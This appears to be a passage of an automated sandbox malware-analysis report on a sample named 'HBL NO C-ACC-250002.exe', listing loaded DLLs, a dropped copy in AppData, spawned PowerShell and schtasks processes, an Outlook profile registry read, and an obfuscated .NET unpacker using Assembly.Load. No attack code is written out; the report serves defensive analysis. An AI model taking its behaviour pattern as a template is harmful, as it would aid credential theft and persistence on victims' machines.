Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: HBL NO C-ACC-250002.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: HBL NO C-ACC-250002.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, GW9cD1MmeOsIOgrcql.cs	.Net Code: YlORmcVtnP System.Reflection.Assembly.Load(byte[])
Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, GW9cD1MmeOsIOgrcql.cs	.Net Code: YlORmcVtnP System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 0_2_07342210 push eax; retf	0_2_0734221D
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_05092E60 push esp; iretd	9_2_05092E79
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B2840 push esp; retf	14_2_057B2AC9
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B2E78 push esp; iretd	14_2_057B2E79
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699F0B2 push es; ret	14_2_0699F0B8

Source: HBL NO C-ACC-250002.exe	Static PE information: section name: .text entropy: 7.829135637285953
Source: uyDicX.exe.0.dr	Static PE information: section name: .text entropy: 7.829135637285953

Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, iyFcKGg9tCppqGG5IB.cs	High entropy of concatenated method names: 'YPYhKoeWJX', 'C3xhL0k6ZA', 'PnZhHZaXrM', 'dMkhJooWLH', 'INmh3Xo95l', 'vLehIe3asP', 'P82h5mjbhW', 'cvxhNXbHvi', 'CX6hsOPlfk', 'miqhrr6hbZ'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, MoqyMhKfR5ZLSgV4xq.cs	High entropy of concatenated method names: 'GDIYqhjdbs', 'iBAYPYG5MT', 'CNZYKdlmr9', 'tmOYLDYbpw', 'X7RYSwAxUA', 'MPHYnJcbq7', 'I3RYZKBBcQ', 'nPvYdXyHFq', 'WZKY1BaUYO', 'rOnYCQLft6'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, YFlHc9FRLodglFhil2.cs	High entropy of concatenated method names: 'CfHoGKJPAp', 'Is2ohx9NjZ', 'YSYo0cBv0r', 'zanoOfxncP', 'vbuoMJn2jp', 'b8b03iXl7I', 'Lpt0IwjhPk', 'lY905vtxKg', 'KFm0NknFcH', 'wNA0sJeaKM'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, Ft1xorcR9nfR3PLHEV2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PpY9fyOqZC', 'reo9u2y3Vp', 'c2R9DhsbFm', 'iSn99eAKWn', 'O1997qWdU8', 'OlP9tXJDZa', 'm3T9Qn6Wyb'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, LTQ4HuccTwyWsx1plV0.cs	High entropy of concatenated method names: 'KapureQ5qN', 'B5auzAZFtv', 'Es1Di1Mf3e', 'S01DcEYaVL', 'WyIDwYYTrL', 'lxPD2ZcUZE', 'BfhDRydOMO', 'H3JDGyQiIk', 'YU6DkfTK7u', 'wygDhwDQHj'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, Tkt4wHlmAKfXdWtNJ2.cs	High entropy of concatenated method names: 'pFsOXCkO2M', 'kvdOyVleBR', 'sucOmc6y86', 'SJROedhrAF', 'RwqOT9kFio', 'aEVOjQrC0X', 'lFpOB0SH6O', 'OryOgUGw3s', 'lFrO6x3DB7', 'CvlOUyBWIb'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, hhLLZuzZxj1m3Zu6xC.cs	High entropy of concatenated method names: 'OBAujm0FlY', 'XdUugdZTyd', 'U12u6HGa6n', 'NdmuFWyiDv', 'XgkuS1Gl0C', 'XGvuZ3H4pw', 'go1ud6txl9', 'A6guQkOSZt', 'tZYuXRHFjo', 'hFAuyGth4v'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, ej4Qr1IUJDvF9DuJ0E.cs	High entropy of concatenated method names: 'iL6bNRoADV', 'X26br5ieKL', 'MjjEi151OW', 'OpUEcNC4yP', 'kJ9bpKkIFm', 'KJnbP6PIu7', 'y3YbxrBuXJ', 'bwtbKpOjah', 'IRobLuBiWs', 'vsrbHUIk72'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, YDRIHlsmNrKQTNfDK1.cs	High entropy of concatenated method names: 'gg9fFTiwm7', 'VoifSbhf42', 'Ceyfns06jS', 'irPfZvtvK4', 'vcafdZPacO', 'N3Jf1NmZOn', 'yEvfCd7IYd', 'dBDfaliCra', 'H7LfllbkJq', 'tpGfqEZFKn'
Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, CX40lb61IQjMgJJ9Xp.cs	High entropy of concatenated method names: 'xMWvee6ruB', 'bZxvjSb03C', 'UxfvgNu6Gx', 'pvfv6lyDuv', 'HksvYYxiNC', 'PJivVbfkA5', 'HG4vbwM19g', 'IUAvE1jlDM', 'C0kvfGVI7n', 'ORFvuhxk0G'
